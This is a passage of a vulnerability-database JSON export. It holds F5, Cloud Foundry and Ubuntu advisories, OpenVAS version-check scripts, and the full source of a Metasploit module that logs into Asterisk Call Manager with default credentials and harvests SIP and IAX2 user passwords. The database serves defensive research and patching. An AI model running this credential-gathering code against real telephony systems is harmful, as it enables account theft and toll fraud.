\n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | ASM control plane, iControl SOAP, eventd \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.3 | 13.1.0 \n13.0.1 \n12.1.3.2 | High | big3d, gtmd, iControl SOAP, eventd \nBIG-IP Edge Gateway | 11.2.1 | None | High | iControl SOAP, eventd \nBIG-IP GTM | 11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 11.6.3.2 \n11.5.7 | High | big3d, gtmd, iControl SOAP, eventd \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | big3d, gtmd, iControl SOAP, eventd \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP PSM | 11.4.1 | None | High | iControl SOAP, eventd \nBIG-IP WebAccelerator | 11.2.1 | None | High | iControl SOAP, eventd \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | iControlPortal.cgi \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\niControl SOAP, eventd and BIG-IP ASM control plane\n\nTo mitigate this vulnerability for iControl SOAP, the **eventd** process, and the BIG-IP ASM control plane, permit management access to F5 products only over a secure network and restrict command line access for affected systems to trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 13.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\nbig3d/gtmd\n\nTo mitigate this vulnerability for the **big3d**/**gtmd** process, limit connections to port 4353 to trusted hosts. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 13.x)](<https://support.f5.com/csp/article/K13309>).\n\n**Note**: If you run **big3d_install** on BIG-IP versions prior to 11.5.0, it is possible that you may install a vulnerable version of **big3d** on systems that are running non-vulnerable versions of the BIG-IP system. In this case, upgrade to a fixed version or hotfix, and refer to [K13312: Overview of the BIG-IP DNS big3d_install, bigip_add, and gtm_add utilities (11.x - 13.x)](<https://support.f5.com/csp/article/K13312>) for information about running **big3d_install** to resolve the issue. \n\n**Note**: The iquery protocol used by the BIG-IP DNS system (formerly BIG-IP GTM) also uses port 4353. Ensure that all of the peer devices are included when you limit connections by IP address.\n\n * [K17329: BIG-IP GTM name has changed to BIG-IP DNS](<https://support.f5.com/csp/article/K17329>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n", "modified": "2018-07-24T04:32:00", "published": "2017-09-19T00:55:00", "id": "F5:K52320548", "href": "https://support.f5.com/csp/article/K52320548", "title": "Expat vulnerability CVE-2016-0718", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-12-07T06:58:25", "bulletinFamily": "exploit", "description": "This module retrieves SIP and IAX2 user extensions and credentials from Asterisk Call Manager service. Valid manager credentials are required.\n", "modified": "2019-08-15T23:10:44", "published": "2017-07-23T09:55:12", "id": "MSF:AUXILIARY/GATHER/ASTERISK_CREDS", "href": "", "type": "metasploit", "title": "Asterisk Gather Credentials", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Asterisk Gather Credentials',\n 'Description' => %q{\n This module retrieves SIP and IAX2 user extensions and credentials from\n Asterisk Call Manager service. Valid manager credentials are required.\n },\n 'Author' => 'bcoles',\n 'References' =>\n [\n ['URL', 'http://www.asterisk.name/sip1.html'],\n ['URL', 'http://www.asterisk.name/iax2.html'],\n ['URL', 'https://www.voip-info.org/wiki/view/Asterisk+manager+API'],\n ['URL', 'https://www.voip-info.org/wiki-Asterisk+CLI']\n ],\n 'License' => MSF_LICENSE))\n register_options [\n Opt::RPORT(5038),\n OptString.new('USERNAME', [true, 'The username for Asterisk Call Manager', 'admin']),\n OptString.new('PASSWORD', [true, 'The password for the specified username', 'amp111'])\n ]\n end\n\n def run\n vprint_status 'Connecting...'\n\n connect\n banner = sock.get_once\n\n unless banner =~ %r{Asterisk Call Manager/([\\d\\.]+)}\n fail_with Failure::BadConfig, 'Asterisk Call Manager does not appear to be running'\n end\n\n print_status \"Found Asterisk Call Manager version #{$1}\"\n\n unless login\n fail_with Failure::NoAccess, 'Authentication failed'\n end\n\n print_good 'Authenticated successfully'\n\n @users = []\n retrieve_users 'sip'\n retrieve_users 'iax2'\n\n if @users.empty?\n print_error 'Did not find any users'\n return\n end\n\n print_status \"Found #{@users.length} users\"\n\n cred_table = Rex::Text::Table.new 'Header' => 'Asterisk User Credentials',\n 'Indent' => 1,\n 'Columns' => ['Username', 'Secret', 'Type']\n\n @users.each do |user|\n cred_table << [ user['username'],\n user['password'],\n user['type'] ]\n report_cred user: user['username'],\n password: user['password'],\n proof: \"#{user['type']} show users\"\n end\n\n print_line\n print_line cred_table.to_s\n\n p = store_loot 'asterisk.user.creds',\n 'text/csv',\n rhost,\n cred_table.to_csv,\n 'Asterisk User Credentials'\n\n print_good \"Credentials saved in: #{p}\"\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n print_error e.message\n ensure\n disconnect\n end\n\n private\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def report_cred(opts)\n service_data = {\n address: rhost,\n port: rport,\n service_name: 'asterisk_manager',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge service_data\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED,\n proof: opts[:proof]\n }.merge service_data\n\n create_credential_login login_data\n end\n\n def send_command(cmd = '')\n sock.put cmd\n\n res = ''\n timeout = 15\n Timeout.timeout(timeout) do\n res << sock.get_once while res !~ /\\r?\\n\\r?\\n/\n end\n\n res\n rescue Timeout::Error\n print_error \"Timeout (#{timeout} seconds)\"\n rescue => e\n print_error e.message\n end\n\n def login\n vprint_status \"Authenticating as '#{username}'\"\n\n req = \"action: login\\r\\n\"\n req << \"username: #{username}\\r\\n\"\n req << \"secret: #{password}\\r\\n\"\n req << \"events: off\\r\\n\"\n req << \"\\r\\n\"\n res = send_command req\n\n return false unless res =~ /Response: Success/\n\n report_cred user: username,\n password: password,\n proof: 'Response: Success'\n\n report_service :host => rhost,\n :port => rport,\n :proto => 'tcp',\n :name => 'asterisk'\n true\n end\n\n def retrieve_users(type)\n vprint_status \"Retrieving #{type.upcase} users...\"\n\n req = \"action: command\\r\\n\"\n req << \"command: #{type} show users\\r\\n\"\n req << \"\\r\\n\"\n res = send_command req\n\n if res =~ /Response: Error/ && res =~ /Message: Permission denied/\n print_error 'Insufficient privileges'\n return\n end\n\n unless res =~ /Response: Follows/\n print_error 'Unexpected reply'\n return\n end\n\n # The response is a whitespace formatted table\n # We're only interested in the first two columns: username and secret\n # To parse the table, we need the characer width of these two columns\n if res =~ /^(Username\\s+)(Secret\\s+)/\n user_len = $1.length\n pass_len = $2.length\n else\n print_error \"'#{type} show users' is not supported\"\n return\n end\n\n users = res.scan(/^Username\\s+Secret.*?\\r?\\n(.*)--END COMMAND--/m).flatten.first\n\n if users.blank?\n print_error \"Did not find any #{type.upcase} users\"\n return\n else\n print_status \"Found #{type.upcase} users\"\n end\n\n users.each_line do |line|\n line.chomp!\n user = line[0...user_len].sub(/\\s+$/, '')\n pass = line[user_len...(user_len + pass_len)].sub(/\\s+$/, '')\n @users << { 'username' => user, 'password' => pass, 'type' => type }\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/asterisk_creds.rb"}], "openvas": [{"lastseen": "2019-07-17T14:18:49", "bulletinFamily": "scanner", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-07-20T00:00:00", "id": "OPENVAS:1361412562310811536", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811536", "title": "Apple Mac OS X Multiple Vulnerabilities-HT207922", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-HT207922\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811536\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-7016\", \"CVE-2017-7033\", \"CVE-2017-7015\", \"CVE-2017-7050\",\n \"CVE-2017-7054\", \"CVE-2017-7062\", \"CVE-2017-7008\", \"CVE-2016-9586\",\n \"CVE-2016-9594\", \"CVE-2017-2629\", \"CVE-2017-7468\", \"CVE-2017-7014\",\n \"CVE-2017-7017\", \"CVE-2017-7035\", \"CVE-2017-7044\", \"CVE-2017-7036\",\n \"CVE-2017-7045\", \"CVE-2017-7025\", \"CVE-2017-7027\", \"CVE-2017-7069\",\n \"CVE-2017-7026\", \"CVE-2017-7068\", \"CVE-2017-9417\");\n script_bugtraq_id(99882, 99883, 99880, 95019, 95094, 96382, 97962, 99482);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-20 12:23:38 +0530 (Thu, 20 Jul 2017)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-HT207922\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A buffer overflow error.\n\n - Multiple input validation issues.\n\n - Multiple issues in curl.\n\n - An input validation issue.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to obtain sensitive information, gain extra privileges and execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.12.x before\n 10.12.6\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.12.6 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207922\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.12\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\nif(\"Mac OS X\" >< osName && osVer =~ \"^10\\.12\")\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.12.6\");\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:05", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-05-18T00:00:00", "id": "OPENVAS:1361412562310843174", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843174", "title": "Ubuntu Update for bash USN-3294-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for bash USN-3294-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843174\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-18 06:50:06 +0200 (Thu, 18 May 2017)\");\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\", \"CVE-2017-5932\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for bash USN-3294-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Bernd Dietzel discovered that Bash\n incorrectly expanded the hostname when displaying the prompt. If a remote\n attacker were able to modify a hostname, this flaw could be exploited to execute\n arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and\n Ubuntu 16.10. (CVE-2016-0634) It was discovered that Bash incorrectly handled\n the SHELLOPTS and PS4 environment variables. A local attacker could use this\n issue to execute arbitrary code with root privileges. This issue only affected\n Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7543) It was\n discovered that Bash incorrectly handled the popd command. A remote attacker\n could possibly use this issue to bypass restricted shells. (CVE-2016-9401) It\n was discovered that Bash incorrectly handled path autocompletion. A local\n attacker could possibly use this issue to execute arbitrary code. This issue\n only affected Ubuntu 17.04. (CVE-2017-5932)\");\n script_tag(name:\"affected\", value:\"bash on Ubuntu 17.04,\n Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3294-1\");\n script_xref(name:\"URL\", value:\"https://www.ubuntu.com/usn/usn-3294-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-7ubuntu1.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.4-2ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-15ubuntu1.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-14ubuntu1.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:55", "bulletinFamily": "scanner", "description": "dict.c in libxml2 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) via an unexpected character immediately after the ", "modified": "2018-10-26T00:00:00", "published": "2017-03-17T00:00:00", "id": "OPENVAS:1361412562310140193", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140193", "title": "F5 BIG-IP - libxml2 vulnerability CVE-2015-8806", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_f5_big_ip_K04450715.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# F5 BIG-IP - libxml2 vulnerability CVE-2015-8806\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140193\");\n script_cve_id(\"CVE-2015-8806\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"F5 BIG-IP - libxml2 vulnerability CVE-2015-8806\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K04450715\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n script_tag(name:\"summary\", value:\"dict.c in libxml2 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) via an unexpected character immediately after the '<!DOCTYPE html' substring in a crafted HTML document.\");\n script_tag(name:\"impact\", value:\"This vulnerability allows disruption of service.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-17 10:24:10 +0100 (Fri, 17 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) ) exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;');\n\nif( report = is_f5_vulnerable( ca:check_f5, version:version ) )\n{\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:05", "bulletinFamily": "software", "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nBernd Dietzel discovered that Bash incorrectly expanded the hostname when displaying the prompt. If a remote attacker were able to modify a hostname, this flaw could be exploited to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. ([CVE-2016-0634](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-0634>))\n\nIt was discovered that Bash incorrectly handled the SHELLOPTS and PS4 environment variables. A local attacker could use this issue to execute arbitrary code with root privileges. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. ([CVE-2016-7543](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7543>))\n\nIt was discovered that Bash incorrectly handled the popd command. A remote attacker could possibly use this issue to bypass restricted shells. ([CVE-2016-9401](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9401>))\n\nIt was discovered that Bash incorrectly handled path autocompletion. A local attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 17.04. ([CVE-2017-5932](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-5932>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3263.x versions prior to 3263.26\n * 3312.x versions prior to 3312.26\n * 3363.x versions prior to 3363.24\n * All other stemcells not listed.\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.122.0\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3263.x versions to 3263.26 or later\n * Upgrade 3312.x versions to 3312.26 or later\n * Upgrade 3363.x versions to 3363.24 or later\n * All other stemcells should be upgraded to the latest version.\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.122.0 or later.\n\n# References\n\n * [USN-3294-1](<http://www.ubuntu.com/usn/usn-3294-1/>)\n * [CVE-2016-0634](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-0634>)\n * [CVE-2016-7543](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7543>)\n * [CVE-2016-9401](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9401>)\n * [CVE-2017-5932](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-5932>)\n * [bosh.io](<https://bosh.io>)\n", "modified": "2017-06-02T00:00:00", "published": "2017-06-02T00:00:00", "id": "CFOUNDRY:550B80029A731B9F485A20D2CDC3D5E4", "href": "https://www.cloudfoundry.org/blog/usn-3294-1/", "title": "USN-3294-1: Bash vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T19:20:44", "bulletinFamily": "unix", "description": "Bernd Dietzel discovered that Bash incorrectly expanded the hostname when displaying the prompt. If a remote attacker were able to modify a hostname, this flaw could be exploited to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-0634)\n\nIt was discovered that Bash incorrectly handled the SHELLOPTS and PS4 environment variables. A local attacker could use this issue to execute arbitrary code with root privileges. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7543)\n\nIt was discovered that Bash incorrectly handled the popd command. A remote attacker could possibly use this issue to bypass restricted shells. (CVE-2016-9401)\n\nIt was discovered that Bash incorrectly handled path autocompletion. A local attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 17.04. (CVE-2017-5932)", "modified": "2017-05-17T00:00:00", "published": "2017-05-17T00:00:00", "id": "USN-3294-1", "href": "https://usn.ubuntu.com/3294-1/", "title": "Bash vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}